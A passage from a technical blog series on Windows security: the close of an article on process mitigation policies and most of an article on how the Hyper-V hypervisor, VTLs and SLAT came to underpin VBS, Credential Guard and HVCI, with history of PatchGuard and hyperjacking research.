plus kCFG and kCET in the kernel; fine-grained forward-edge protection on Windows in 2026 means LLVM's `-fsanitize=cfi-icall` on opted-in builds, not XFG. Only the return-edge variant. CET shadow stack catches any attempt to corrupt a return address on the regular stack and then return through it [@cet-techcommunity-wayback]. *Call-oriented programming* (COP, chains of `call`-terminated gadgets) and *jump-oriented programming* (JOP, chains of `jmp`-terminated gadgets) preserve the call/return invariant -- the gadgets do not return through corrupted stack frames -- so CET sees nothing. COOP (section 5) chains entire legitimate virtual function calls with matching call/return pairs; CET also sees nothing [@coop-ieeesecurity-pdf]. CET stops *classical* ROP. It does not stop code-reuse exploitation in general. Because ACG, enabled in Edge in Windows 10 1703 (March 2017), made in-process JIT a `STATUS_DYNAMIC_CODE_BLOCKED` error [@miller-acg-blog]. The Chakra JIT (then later V8 when Edge moved to Chromium) was rearchitected to run in a separate JIT process that compiles JavaScript and ships the compiled code back to the renderer via an authenticated IPC channel plus a signed-section mapping. The renderer maps the signed section read-execute via `MapViewOfFile`; nothing in the renderer ever calls `VirtualAlloc(PAGE_EXECUTE_*)`. Section 8 walks the architecture in detail. They constrain the exploit chain but do not fix the root-cause bug. Data-oriented attacks (DOP, section 13) are Turing-complete and survive every CFI variant because no control flow is ever hijacked [@dop-paper]. Signed-but-vulnerable DLLs survive CIG. ACG plus CIG closes the *code* dimension on a hardened process, but a sufficiently-determined attacker who finds a write-what-where primitive can still build a data-only exploit chain in any nontrivial program. The long-term answer is memory-safe languages; Microsoft has been publicly committing to Rust in Windows since 2019, and Matt Miller's BlueHat IL 2019 talk gave the structural justification: "~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues" [@miller-bhil-pdf]. The short-term answer is the recipe in section 15: stack the mitigations, document the gaps, and treat memory-safety as the limit you are working against.

The bug is still there. The exploit is just much harder. The article ends where it began: a renderer process that survived an info-leak-plus-write-what-where chain because six per-process mitigations all held at once. That is what Windows process mitigation policies do.

Above Ring Zero: How the Windows Hypervisor Became a Security Primitive

noreply@paragmali.com (Parag Mali) — Sun, 10 May 2026 00:00:00 GMT

**The Windows hypervisor is the program that loaded before Windows did.** It runs at a privilege level the Windows kernel cannot reach and owns the page tables that decide which memory the Windows kernel may even see. Virtualization-Based Security, Credential Guard, HVCI (Memory Integrity in Windows Security), Application Control, VBS Enclaves, and System Guard Secure Launch are all built by composing five primitives the hypervisor exposes -- partitions, hypercalls, intercepts, SynIC, and per-VTL SLAT. The substrate is real, alive, and producing two to four public CVEs per year; the residual attack surface (firmware below, side channels above, IOMMU bypass beside, hypervisor rollback) is where Windows security still earns its hardest miles.

1. Above Ring Zero

On a Windows 11 machine with VBS turned on, a kernel-mode driver running with full Ring-0 privilege cannot read a single byte of the LSASS process's credential cache. It cannot load an unsigned driver. It cannot patch ntoskrnl.exe. It cannot disable HVCI without a reboot. None of this is enforced by Windows. It is enforced by a different program -- one that loaded before Windows did, that runs at a privilege level the Windows kernel cannot reach, and that owns the page tables that say which memory the Windows kernel may even see. That program is the Windows hypervisor [@ms-hyperv-architecture, @ms-tlfs-vsm].

The intuition this fact violates is older than most readers' careers. "SYSTEM owns the box." Every introductory security course teaches it. Local administrator escalates to SYSTEM, SYSTEM loads a driver, the driver runs in the kernel, and the kernel can do anything to the machine. That model is correct for a Windows installation running without Virtualization-Based Security. It is wrong, in three specific and load-bearing ways, for a Windows installation that has VBS turned on.

A Windows security architecture that uses the Hyper-V hypervisor to create a small, isolated execution environment alongside the normal Windows operating system. The hypervisor allocates a portion of memory, configures its second-level page tables to make that memory unreadable and unwritable from normal kernel mode, and runs Microsoft-signed code there -- the Secure Kernel and isolated user-mode trustlets -- that the regular NT kernel cannot reach. Credential Guard, HVCI, Application Control, and System Guard all sit on top of this primitive [@ms-tlfs-vsm].

The binary in question is named hvix64.exe on Intel hosts and hvax64.exe on AMD hosts.Loose security writing sometimes calls the hypervisor's privilege level "Ring -1." That phrase is colloquial. Intel's manuals say "VMX root operation"; AMD's manuals say "SVM host mode." Both terms denote a CPU operating mode that sits architecturally outside the four-ring privilege stack the guest OS sees, not a fifth ring inside it. It is loaded by hvloader.efi before winload.exe ever runs. By the time the Windows boot manager hands control to the NT kernel, the hypervisor has already configured the CPU's virtualization extensions, allocated its own private memory, taken ownership of the IOMMU, and set up the per-partition second-level page tables that decide which physical pages each partition can see [@ms-tlfs-pdf]. From the NT kernel's point of view, the machine starts up already inside a guest partition. There is no escape upward.

This article is about the program that loaded first. The siblings in this series -- on the Secure Kernel, on Credential Guard and NTLMless, on Secure Boot, and on Adminless -- all assume what this article explains. Each of them describes a policy: the Secure Kernel enforces code integrity; Credential Guard isolates LSASS; Adminless raises the bar on local administrator. None of those policies would be enforceable without a piece of software running at a privilege level the policy's adversary cannot reach. The hypervisor is that piece of software, and "security primitive" is how Microsoft, the security research community, and the bug-bounty market all describe its current role.

By the end of this article you will know five things. First, why the hypervisor became a security primitive -- the architectural failure of Ring-0 defenses that Microsoft fought for a decade and finally gave up on in 2015. Second, how it became one, in three steps: Popek and Goldberg's 1974 virtualizability theorem; Intel VT-x and AMD-V in 2005-2006; and David Hepkin and Arun Kishan's 2013 patent on hierarchical Virtual Trust Levels [@us9430642b2-patent]. Third, what it enforces, feature by feature, with the hypervisor primitive that backs each: HVCI rides on per-VTL SLAT; Credential Guard rides on SynIC plus the secure-call ABI; System Guard Secure Launch rides on DRTM [@ms-system-guard-secure-launch]. Fourth, where it has actually failed in public -- six worked CVEs across three distinct attack classes, all narrowly localized. Fifth, what is structurally outside its mandate: firmware below the hypervisor, microarchitectural side channels above it, IOMMU bypass beside it, and hypervisor rollback through the update pipeline.

The story is half engineering and half conceptual inversion. How did a server-consolidation hypervisor that shipped in 2008 with Windows Server 2008 -- a product whose original marketing pitch was "run more VMs per box" -- become the architectural substrate that protects every load-bearing Windows security boundary in 2026? The answer begins in 1974, with a paper that defined what a hypervisor even is. But the political and engineering thread begins five years before that, in San Mateo, California.

2. Origins -- Connectix to Viridian to Hyper-V

Microsoft entered the virtualization market three years late and by acquisition. On February 19, 2003, the company bought Connectix, a small San Mateo software house founded in 1988 that had built Virtual PC for Macintosh and, later, Virtual PC for Windows. The Connectix engineers became the nucleus of what Microsoft would internally call the Windows Server Virtualization team. The acquired products shipped as Microsoft Virtual PC 2004 and Microsoft Virtual Server 2005. Both were Type-2 hypervisors -- user-mode applications that ran on top of Windows, using software techniques rather than CPU virtualization extensions, because the CPU virtualization extensions did not yet exist on shipping x86 hardware.

A hypervisor that runs directly on hardware rather than as an application on top of a host operating system. The hypervisor owns the CPU, the second-level page tables, and (in the security-relevant case) the IOMMU; guest operating systems run at a lower privilege level, in partitions or virtual machines that the hypervisor schedules and isolates. IBM's CP-67/CMS in 1968 is the genre's origin; VMware ESX, Xen, and the Microsoft hypervisor (`hvix64.exe`/`hvax64.exe`) are the modern examples [@wp-hypervisor].

In 2005, the team began a new project under the codename "Viridian." The goal was a Type-1 micro-kernelized hypervisor for x86-64 -- a fresh build, not a derivative of Virtual Server -- that required hardware virtualization extensions at install time. Intel's VT-x had shipped in November 2005 with the Pentium 4 662/672; AMD-V had shipped on May 23, 2006 with the Socket AM2 platform, initially available across Athlon 64 X2 and Athlon 64 FX and select Athlon 64 models. Both were now broadly enough deployed that Microsoft could make hardware virtualization a system requirement rather than a configuration option. Three years later, on June 26, 2008 (Wikipedia's body text gives this date; the infobox states June 28), Hyper-V reached RTM and was delivered as a Windows Server 2008 feature through Windows Update [@wp-hyperv].Microsoft ships two hypervisor binaries: hvix64.exe for Intel hosts (using VT-x) and hvax64.exe for AMD hosts (using AMD-V). The instruction-set-architecture divergence is real -- Intel uses vmcall to enter the hypervisor; AMD uses vmmcall -- but the hypercall ABI surface above that single instruction is identical, so the rest of the Microsoft hypervisor codebase is shared between the two binaries.

The 2008 design choices are worth naming individually because the ones that mattered for server consolidation turned out, twelve years later, to also be the ones that mattered for security. Three deserve flagging:

Micro-kernelized architecture. The hypervisor binary contains only the minimum machinery needed to virtualize the CPU, schedule VMs, and enforce memory isolation. It does not contain device drivers. It does not contain a network stack. It does not contain a filesystem.
Root partition plus child partitions. From the Microsoft architecture documentation: "The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems" [@ms-hyperv-architecture]. The root partition is a full Windows install; the child partitions are guest VMs.
VMBus, VSP, and VSC. Inter-partition I/O happens over the VMBus -- a paravirtualized message channel. A Virtualization Service Provider (VSP) runs in the root partition and owns the real device; a Virtualization Service Client (VSC) runs in each child partition and talks to the VSP over VMBus. Device emulation lives in the root partition's user-mode and kernel-mode code, not in the hypervisor binary itself. This is the choice that, twelve years later, kept the hypervisor's Trusted Computing Base small enough to be defensible.

flowchart TD subgraph Root["Root partition (Windows Server)"] RD["Real device drivers"] VSP["Virtualization Service Providers"] VMM["VM Worker Processes (vmwp.exe)"] end subgraph Child1["Child partition 1 (guest OS)"] VSC1["Virtualization Service Clients"] Guest1["Guest kernel + apps"] end subgraph Child2["Child partition 2 (guest OS)"] VSC2["Virtualization Service Clients"] Guest2["Guest kernel + apps"] end HV["Microsoft Hypervisor (hvix64.exe / hvax64.exe)"] HW["Hardware (CPU, RAM, NIC, disk)"] Root -. VMBus .- Child1 Root -. VMBus .- Child2 Root --> HV Child1 --> HV Child2 --> HV HV --> HW

The micro-kernel, root-plus-child, and VMBus choices were defensible server engineering. Their server engineering rationale was that emulating a NIC, or a SCSI controller, or a graphics adapter inside a hypervisor binary would balloon the binary's size, lock its code-review cycles to those of every device the company shipped, and force the same security-critical code that scheduled CPUs to also handle Ethernet frame parsing. Putting device emulation in a normal Windows process inside the root partition -- the VM Worker Process vmwp.exe -- meant the hypervisor binary could stay small enough to reason about.

The 2008 design goal was, again, server consolidation. Microsoft's positioning materials at the time named "run more VMs per box, get better hardware use" as the customer pitch. Nothing in the 2008 Hyper-V documentation describes the hypervisor as a security primitive for the host OS. The security re-purposing -- the moment Hyper-V's hardware-privilege isolation became the way Windows itself protected its own kernel from itself -- did not arrive until 2015. To understand why it arrived at all, we have to back up thirty-four years to a 1974 paper that defined what virtualization formally requires.

3. The Theoretical Anchor -- Popek, Goldberg, and SLAT

Before Microsoft could build a hypervisor that ran security-critical code at a higher privilege than the Windows kernel, two unrelated decisions had to land. One was made in 1974, by two researchers who would never see Windows. The other was made in 2005, by Intel.

In July 1974, Gerald Popek of UCLA and Robert Goldberg of Harvard published "Formal Requirements for Virtualizable Third Generation Architectures" in Communications of the ACM. The paper laid down three properties any "true" virtual machine monitor must satisfy:

Equivalence. Programs run on the VMM exhibit behavior essentially identical to behavior on the bare machine, except for differences due to timing and resource availability.
Resource control. The VMM, not the guest, controls the system resources -- CPU time slices, memory, devices.
Efficiency. A statistically dominant subset of the instruction stream executes directly on hardware, without VMM intervention.

The theorem that gave the paper its lasting reputation followed from those properties. Let a sensitive instruction be one that either reads or modifies privileged state (the processor's mode bits, page-table base register, interrupt mask). Let a privileged instruction be one that traps when executed in user mode. Then a sufficient condition for an ISA to be virtualizable is that every sensitive instruction is privileged. The intuition is simple: the VMM must get a chance to see -- and to handle -- every guest action that touches the machine's privileged state. If the CPU silently lets the guest do something privileged-feeling without trapping, the VMM cannot maintain equivalence and control simultaneously.

A property of a processor architecture: every sensitive instruction in the instruction set is privileged. An architecture with this property can be virtualized "classically" -- with a thin trap-and-emulate hypervisor whose only entry points are the traps the CPU raises on privileged-instruction violations. An architecture without this property requires software workarounds (binary translation, paravirtualization) or hardware extensions (VT-x, AMD-V) before a Popek-Goldberg-style VMM can be built.

For three decades, x86 was famously not virtualizable in the Popek-Goldberg sense. John Robin and Cynthia Irvine enumerated the problem in their 2000 USENIX Security paper: seventeen protected-mode instructions on the IA-32 architecture either read or modified privileged state without trapping from user mode.The Robin and Irvine enumeration includes instructions like SGDT (store global descriptor table register), SIDT (store interrupt descriptor table register), SLDT (store local descriptor table register), SMSW (store machine status word), and PUSHF/POPF (push/pop flags including IOPL). Each of these silently returned or accepted privileged state from user mode without raising a fault. The aggregate effect was that no classical Popek-Goldberg VMM could correctly virtualize an unmodified x86 guest -- every one of those seventeen instructions was a hole the VMM could not see through. VMware Workstation, released in 1999 by VMware Inc. (which had been founded the year prior by Mendel Rosenblum, Diane Greene, Scott Devine, Ellen Wang, and Edouard Bugnion), worked around the problem with binary translation: it dynamically rewrote each protected-mode guest instruction stream to substitute or trap the seventeen offenders. The technique imposed double-digit overhead, made debugging miserable, and was a security liability in its own right -- the binary translator itself was a parser of arbitrary attacker-controlled code.

Intel and AMD ended the problem in hardware. Intel VT-x (codename Vanderpool, November 2005) and AMD-V (codename Pacifica, May 2006) added a new CPU mode -- VMX root operation for Intel, SVM host mode for AMD -- and a new instruction-emulation mechanism. A VM exit could be configured to fire on every sensitive instruction the hypervisor wished to intercept, transferring control to the host with a structured exit reason and an opaque, host-controlled snapshot of guest state. After 2006, x86-64 became Popek-Goldberg-virtualizable in hardware [@wp-x86-virtualization].

sequenceDiagram participant Guest as Guest OS (VMX non-root) participant CPU as CPU hardware participant HV as Hypervisor (VMX root) Guest->>CPU: MOV CR3, rax (sensitive instr) CPU->>HV: VM-EXIT (reason 28: CR access) HV->>HV: Read VMCS exit-qualification HV->>HV: Validate, emulate, update SLAT HV->>CPU: VMRESUME CPU->>Guest: Continue guest at next instruction

One architectural element more was needed before any of this could be a security primitive rather than just a virtualization primitive. Classical x86 paging maps a guest virtual address to a physical address through a single CPU-walked page table. In a virtualized system that single table cannot be enough, because the guest needs its own virtual-to-physical map and the host needs to remap the guest's "physical" address to a real machine-physical address. The first generations of VT-x simulated this two-level mapping in software through shadow page tables, which the hypervisor had to maintain alongside the guest's tables on every page-table edit. Shadow paging was correct but slow, and it gave the hypervisor no clean way to enforce a different memory map for different parts of the same guest.

Second-Level Address Translation (SLAT) -- Intel's Extended Page Tables (EPT, shipped with Nehalem in November 2008) and AMD's Nested Page Tables (NPT, shipped with the Barcelona-generation Opteron on September 10, 2007) -- solved both problems in hardware. The guest walks its own page table from virtual to "guest physical"; the CPU then walks a second, hypervisor-owned page table from "guest physical" to "system physical." Two key properties follow. First, the hypervisor has exclusive control of the second-level mapping; the guest cannot read, write, or even know that it exists. Second, because the second-level mapping is per-partition, the hypervisor can give two partitions different views of the same machine physical memory -- the same page can be readable in one partition and entirely absent in another.

A hardware feature on Intel (EPT) and AMD (NPT) CPUs that lets the hypervisor maintain a second page table mapping guest-physical addresses to system-physical addresses. The CPU walks the guest's own page table for the virtual-to-guest-physical mapping, then walks the hypervisor's table for the guest-physical-to-system-physical mapping. Because the second table is hypervisor-controlled and per-partition, the hypervisor can give different partitions -- and, in VBS, different Virtual Trust Levels inside the same partition -- different views of physical memory. SLAT is the bedrock of VTL memory protection [@ms-tlfs-pdf].

Hyper-V required VT-x or AMD-V at install time from day one. SLAT became mandatory with Windows Server 2016 and Windows 10 1607 [@ms-hyperv-architecture].

Popek and Goldberg gave us the property. Intel and AMD gave us the hardware. Microsoft used both to build a server hypervisor in 2008. But for the first seven years of Hyper-V's life, none of that machinery protected Windows from itself. Microsoft hadn't yet noticed the architectural problem that made it necessary -- or rather, they had noticed the problem (PatchGuard's bypass record was public) and had not yet conceded that the problem was structural. The concession came in 2015. What forced it was the same-privilege paradox.

4. The Same-Privilege Paradox -- Why PatchGuard Was Never Enough

PatchGuard, which Microsoft shipped in 2005 with Windows Server 2003 SP1 x64, ran inside ntoskrnl.exe at Ring 0 and scanned a curated list of kernel structures -- the system service dispatch table, the interrupt descriptor table, the kernel image's .text section -- at randomized intervals to detect tampering. It was bypassed within months by Skywing's Uninformed writeups. Microsoft kept shipping it. Researchers kept bypassing it. The pattern lasted a decade. The reason is not that PatchGuard's authors were sloppy [@wp-kpp]. The reason is structural, and naming it correctly is the first of the three insights this article is built around.

Key idea: Any defense reachable by mov from Ring 0 is defeasible by mov from Ring 0.

The intuition is simple. PatchGuard is a piece of code. It lives in the kernel's virtual address space at some page. It owns a timer that re-runs it periodically. It maintains a randomization seed for which structures it checks next. It has a callback path into KeBugCheckEx if it detects tampering. Every one of those four assets -- the code page, the timer callback, the randomization seed, the bug-check path -- is a kernel data structure or a kernel virtual address. An attacker with Ring-0 code execution can locate each of them by searching the same kernel address space PatchGuard searches. They can patch the callback so the timer no-ops. They can patch the seed so the randomization is predictable. They can patch the bug-check path so it reports success. They can do all of this with a sequence of plain mov instructions. PatchGuard cannot defend against this, because PatchGuard's defenses live in the same place its attacker's writes do.

PatchGuard and its attacker are colleagues, not adversaries. They share an office. The office is `ntoskrnl.exe`'s virtual address space, and there is no key on the door.

This is the same-privilege paradox. It is not an implementation bug. It does not yield to better obfuscation, more randomization, or harder-to-find timers. It is an architectural ceiling. A defense at privilege level $P$ cannot be enforced against an attacker who also runs at privilege level $P$, because the defender's state lives in the attacker's address space. The defender can be made expensive to find; it cannot be made impossible to find, because the attacker has the same instructions, the same address-space view, and the same MMU privileges as the defender.

Note: The same-privilege paradox is a property of where the defense lives, not of how clever the defense is. PatchGuard's authors did add randomization. They did add multiple decoy callbacks. They did add cryptographically derived integrity checks. None of those reductions changes the basic fact that the attacker, holding the same Ring-0 privilege, can locate and edit each of them. The architectural fix is not better PatchGuard. The architectural fix is moving the defender to a privilege level the attacker cannot reach.

Once the paradox is named, the defender's choice is binary. Either give up on having a defense at all -- treat Ring 0 as a free-fire zone where any malware that gets there has won -- or move the defender to a privilege level above Ring 0, at a hardware boundary the attacker's mov instructions cannot cross. Microsoft picked the second. It is the only architecturally honest choice.

To make it work, Microsoft needed three things. The first was a hypervisor already deployed on every Windows install. They had that since 2008. The second was a way to put a piece of Windows itself -- code, data, secrets -- inside the hypervisor's protection without spawning a separate VM, because spawning a separate VM doubles the system's resource cost and forces every Windows process to choose between living on the normal side or the secure side. That required an architectural idea that did not yet exist in 2010: a way to split a single partition into two privilege levels, each with its own SLAT mapping and its own register state. The third was a way to ensure the hypervisor itself could not be silently replaced or rolled back beneath the OS. That required a hardware-rooted measurement -- a DRTM event -- that the OS could attest to.

The architectural idea is the subject of section 6. The DRTM measurement is the subject of section 11. Both of them required a decade-long conversation about whether the hypervisor itself could be trusted at all -- a conversation that ran in parallel during the same years and that briefly seemed to argue the opposite case. We turn to that conversation next.

5. The Hyperjacking Era -- SubVirt, Blue Pill, and CloudBurst

While Microsoft was finishing Hyper-V, the security community was establishing that a hypervisor was not just a defense -- it was also the most powerful possible attacker against the OS sitting above it. Three demonstrations in three years made the point unmistakable.

SubVirt. In May 2006, Samuel King and Peter Chen at the University of Michigan, joined by Yi-Min Wang, Chad Verbowski, Helen Wang, and Jacob Lorch at Microsoft Research, presented "SubVirt: Implementing Malware with Virtual Machines" at IEEE S&P [@king-subvirt-2006]. Their construction was a Virtual Machine Based Rootkit (VMBR). A privileged installer running inside a legitimate OS installed a malicious VMM at boot time; on the next reboot, the malicious VMM ran first, brought up the original OS as a guest underneath it, and gained the privileged position of seeing every CPU instruction, every memory access, and every I/O the OS performed. The original OS had no architectural way to tell it was no longer the most-privileged software on the box. SubVirt was demonstrated against Windows XP (using Microsoft Virtual PC as the malicious VMM substrate) and against Linux (using VMware Workstation), specifically to show that the technique was not tied to any one operating system or any one hypervisor product.

Blue Pill. Three months later, at Black Hat USA 2006, Joanna Rutkowska of COSEINC demonstrated "Subverting Vista Kernel for Fun and Profit" [@wp-blue-pill]. Her tool, codenamed Blue Pill, took a step beyond SubVirt by doing the VMM insertion at runtime rather than at boot. The technique: a Ring-0 driver, running inside an already-booted Windows install on an AMD-V capable host, executed VMRUN against an attacker-controlled Virtual Machine Control Block (VMCB) whose initial state matched the current physical CPU. The CPU dropped out of SVM root mode and re-entered as a guest under the attacker's VMM. The OS continued running normally, with no boot-loader modification and no reboot.

By 2007, Rutkowska and Alexander Tereshkin returned to Black Hat USA with the more polished "IsGameOver(,) Anyone?" presentation, refining the technique and addressing the early critics' detection ideas [@wp-blue-pill].Rutkowska's marketing claim that Blue Pill was "100% undetectable" attracted a public counter-effort: in 2007, Edgar Barbosa, Nate Lawson, Peter Ferrie, and Tom Ptacek all proposed detection techniques relying on side channels (timing artifacts of trapped instructions, TSC skew, structural differences in how RDTSC behaves under VT-x). The claim softened in subsequent publications, but the underlying point survived: a hostile thin hypervisor below a victim OS can be made arbitrarily difficult to detect from inside that OS, and the only architecturally clean way to know what you are running under is to measure the boot chain before the OS starts.

CloudBurst. At Black Hat USA 2009, Kostya Kortchinsky of Immunity Inc. presented CLOUDBURST. It was the first publicly demonstrated arbitrary-code-execution guest-to-host escape against a commercial hypervisor: a heap overflow in VMware's emulated SVGA-II graphics adapter, tracked as CVE-2009-1244 [@nvd-cve-2009-1244]. A guest VM, executing entirely inside a VMware-managed user-mode process on the host, could overflow a buffer in that process and gain host code execution. CloudBurst's lasting operational lesson was not the specific bug but the attack surface: device emulation -- not the trap-and-emulate core of the hypervisor -- is the largest piece of guest-attacker-controlled code in any commercial VMM. Every Hyper-V guest-to-host escape Microsoft has shipped a patch for since 2018 lands in either this device-emulation surface or the hypercall input-validation surface that mediates the same kinds of structured guest-controlled input.

flowchart TD subgraph Before["Before hyperjacking"] OS1["Victim OS"] FW1["Firmware (UEFI)"] HW1["Hardware"] OS1 --> FW1 FW1 --> HW1 end subgraph After["After hyperjacking"] OS2["Victim OS (now a guest)"] VMM["Hostile VMM (SubVirt / Blue Pill)"] FW2["Firmware (UEFI)"] HW2["Hardware"] OS2 --> VMM VMM --> FW2 FW2 --> HW2 end

The three demonstrations established a difficult dual truth. The hypervisor is the most powerful defender against an OS-level attacker, and it is the most powerful attacker against an OS-level defender. The same primitive can play either role; which role it plays in any given system depends only on whose hypervisor it is and whether the OS above it can prove that. SubVirt-style attacks did not require Microsoft to invent anything new -- they only had to be a possibility -- to force Microsoft into a design constraint: any "hypervisor as security primitive" architecture has to start by being the only hypervisor on the box, with a measurement of the hypervisor binary recorded in a TPM platform configuration register so that any malicious VMBR underneath could be detected at attestation time. This is the role that System Guard Secure Launch (DRTM) plays in the architecture, and we will return to it in section 11.

Blue Pill (offense) and VBS (defense) are architecturally identical. Each is a thin Type-1 hypervisor that interposes between firmware and OS. Each owns the CPU's virtualization mode, the second-level page tables, and the IOMMU. Each is invisible to the OS unless the OS can prove what is underneath it. The only differences between them are whose hypervisor it is, whether it was measured at load time, and what it does with its privilege. The defense is the offense, run by the right people, in the right order, and attested to.

By 2010 the security community had agreed: the hypervisor is the most powerful primitive in the system, and whoever owns the SLAT page tables owns the box. Joanna Rutkowska's Invisible Things Lab launched Qubes OS, an explicitly hypervisor-rooted security OS, on April 7, 2010 [@qubes-introducing-2010]. Microsoft owned the SLAT page tables. They had a hypervisor on every Windows install. They had a server-consolidation product. What they did not yet have was a reason to re-purpose any of it for security. The reason was already being filed at the United States Patent and Trademark Office. The priority date was September 17, 2013.

6. The Pivot -- VSM, VTLs, and the Hepkin-Kishan Patent

On September 17, 2013, David Hepkin and Arun Kishan filed United States patent application 14/186,415, which would issue on August 30, 2016 as US Patent 9,430,642 B2 [@us9430642b2-patent]. The patent's title, "Providing virtual secure mode with different virtual trust levels," reads like marketing now because the words it introduced -- "Virtual Trust Level," "VTL," "Virtual Secure Mode" -- became Microsoft's own canonical terminology. In 2013 the words did not exist. The patent describes, in 2013, exactly what Microsoft shipped twenty-two months later in Windows 10 build 10240 [@ms-tlfs-vsm].

The patent's claim language is unusually specific. It teaches a virtual-machine manager that makes "multiple different virtual trust levels available to virtual processors of a virtual machine"; it teaches that "different memory access protections (such as the ability to read, write, and/or execute memory) can be associated with different portions of memory (e.g., memory pages) for each virtual trust level"; and it teaches that "the virtual trust levels are organized as a hierarchy with a higher level virtual trust level being more privileged than a lower virtual trust level." Each of those phrases is now a feature of the shipping Microsoft hypervisor.

A hypervisor-managed privilege level inside a single partition. Each VTL has its own SLAT mapping (so the same machine page can be readable in one VTL and absent in another), its own virtual-processor register state (so a VTL transition is a context switch, not a procedure call), and its own interrupt subsystem (so interrupts targeted at one VTL do not preempt code running in another). VTLs are hierarchical: a higher VTL can read all of a lower VTL's memory, but not vice versa. The shipping Microsoft hypervisor implements two VTLs (VTL0 = Normal world, VTL1 = Secure world); the architecture admits up to sixteen [@ms-tlfs-vsm].

Windows 10 RTM on July 29, 2015, and Windows Server 2016, shipped VBS atop the existing Hyper-V hypervisor [@wp-windows-10]. The architectural innovation -- the thing the patent was for -- was that VTL0 (Normal world, containing the NT kernel, user mode, and LSASS) and VTL1 (Secure world, containing the Secure Kernel and Isolated User Mode trustlets) ran inside the same partition rather than in two separate partitions. VBS is not a second VM. It is a per-VTL SLAT split inside the root partition, plus a per-VTL register-state snapshot, plus a per-VTL interrupt delivery surface. The hypervisor switches SLAT contexts on VTL transitions, exactly as it would switch SLAT contexts on a partition switch -- but the switch happens inside a single partition's address space, so there is no extra VM scheduling and no extra OS image to manage.

flowchart TD subgraph Root["Root partition"] subgraph VTL0["VTL0 -- Normal world"] NT["NT kernel (ntoskrnl.exe)"] User["User mode (lsass.exe, applications)"] end subgraph VTL1["VTL1 -- Secure world"] SK["Secure Kernel (securekernel.exe)"] IUM["Isolated User Mode trustlets"] LSAISO["LSAISO.EXE"] VTPM["vTPM trustlet"] IUM --- LSAISO IUM --- VTPM end end HV["Microsoft Hypervisor (hvix64 / hvax64)"] HW["Hardware (CPU, RAM, IOMMU, TPM)"] VTL0 -. "Secure call (hypercall + SynIC)" .-> VTL1 VTL1 --> HV VTL0 --> HV HV --> HW

The Hyper-V Top-Level Functional Specification, chapter 15, names the architectural facts verbatim. "VSM achieves and maintains isolation through Virtual Trust Levels (VTLs). VTLs are enabled and managed on both a per-partition and per-virtual processor basis." "Virtual Trust Levels are hierarchical, with higher levels being more privileged than lower levels." "Architecturally, up to 16 levels of VTLs are supported; however a hypervisor may choose to implement fewer than 16 VTL's. Currently, only two VTLs are implemented." The C-level definition #define HV_NUM_VTLS 2 is published in the same specification [@ms-tlfs-vsm]. Two VTLs are what ships; the architecture has room for more.

VSM enables operating system software in the root and guest partitions to create isolated regions of memory for storage and processing of system security assets. Access to these isolated regions is controlled and granted solely through the hypervisor, which is a highly privileged, highly trusted part of the system's Trusted Compute Base (TCB). -- Microsoft, *Hyper-V Top-Level Functional Specification*, chapter 15 [@ms-tlfs-vsm]

This is the second insight the article is built around: VBS is not a re-architecture. It is a re-purposing. The hypervisor was already on every Windows install for unrelated reasons. The 2015 pivot did not require new hardware, new VMs, or new CPUs. It required a new way to organize what was already there -- two SLAT mappings instead of one, two register snapshots instead of one, a secure-call ABI on top of the SynIC -- and a Windows-side Secure Kernel binary to run inside the new VTL1 view. The patent gave the design its formal expression; the engineering had been waiting since 2008 for the right architectural insight.David Hepkin spent over a decade on the NT kernel architecture team before the VSM design; Arun Kishan was an NT kernel architect and is now Microsoft's Corporate Vice President for the Operating Systems Platform group. Neither is a virtualization specialist by background. Their patent is, in retrospect, a kernel-team idea about how to put a piece of the kernel itself behind a hardware boundary the kernel cannot cross -- exactly the kind of design that an architect who had lived inside ntoskrnl.exe for years would invent.

Alex Ionescu's Black Hat USA 2015 deck "Battle of SKM and IUM: How Windows 10 Rewrites OS Architecture" reverse-engineered the entire VSM stack within four weeks of Windows 10 RTM [@ionescu-bh-2015]. The vocabulary Ionescu introduced has become the canonical research language for talking about VBS: VTL as "synthetic ring level managed by the hypervisor"; trustlets for the user-mode processes that run inside VTL1's Isolated User Mode; Signature Level 12 plus the IUM EKU 1.3.6.1.4.1.311.10.3.37 as the loader's signing requirement. Microsoft's own developer documentation now uses the same terms [@ms-iso-user-mode-trustlets].

The pivot, then, was not a sudden re-architecture. It was the cash-out of a deliberate multi-year engineering plan that began at least twenty-two months before Windows 10 RTM. To see what VBS actually enforces -- and which hypervisor primitive backs each piece of that enforcement -- we need to walk the hypervisor's public surface. There are five surfaces. They are the architectural body of the article.

7. Architecture Tour -- The Hypervisor's Public Surface

What does the Windows hypervisor actually look like as a piece of software? It is a small kernel, on the order of one to two hundred thousand lines of C and C++ by community estimate; Microsoft has not published a primary line count. It has five externally visible surfaces, all of which are documented in the Hyper-V Top-Level Functional Specification (TLFS) v6.0b [@ms-tlfs-pdf]. We walk them in turn.

7.1 Partitions, VMBus, and the VSP/VSC pair

A partition is the hypervisor's unit of isolation. From the Microsoft architecture page: "The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems" [@ms-hyperv-architecture]. The root partition is a full Windows install with privileged hypercalls and direct access to hardware; each child partition is a guest VM with only the hardware the root has chosen to expose.

A guest VM does I/O over the VMBus. A network packet, for example, travels from the guest application down to the guest's Windows NDIS stack; through the synthetic NIC miniport driver (the VSC) in the guest's kernel; over the VMBus message channel; into the network VSP in the root partition; into the root's real NDIS stack; into the physical NIC driver; out the wire. The hypervisor's role in this chain is structural: it owns the VMBus message channel, the SynIC interrupts that notify the VSP and VSC of new traffic, and the per-partition SLAT mappings that decide which bytes either side can read.

The architectural implication is that device emulation lives in the root partition, not in the hypervisor binary. The TCB the hypervisor binary itself has to protect is narrow. The TCB the root partition's drivers have to protect is much wider -- but those drivers live in normal Windows kernel mode, where Microsoft has thirty years of tooling. This is why almost every public Hyper-V CVE since 2018 has landed in vmswitch.sys, storvsp.sys, or the NT Kernel Integration VSP, rather than in hvix64.exe itself.

Note: Putting device emulation in the root partition means the hypervisor binary does not need to parse Ethernet frames, SCSI commands, USB descriptors, or graphics-adapter command rings. The trade-off is that the root partition becomes part of the TCB -- a root-partition kernel-mode bug is a hypervisor-equivalent break -- but the small hypervisor binary itself can be reviewed, fuzzed, and reasoned about as a single piece of code.

7.2 The hypercall ABI

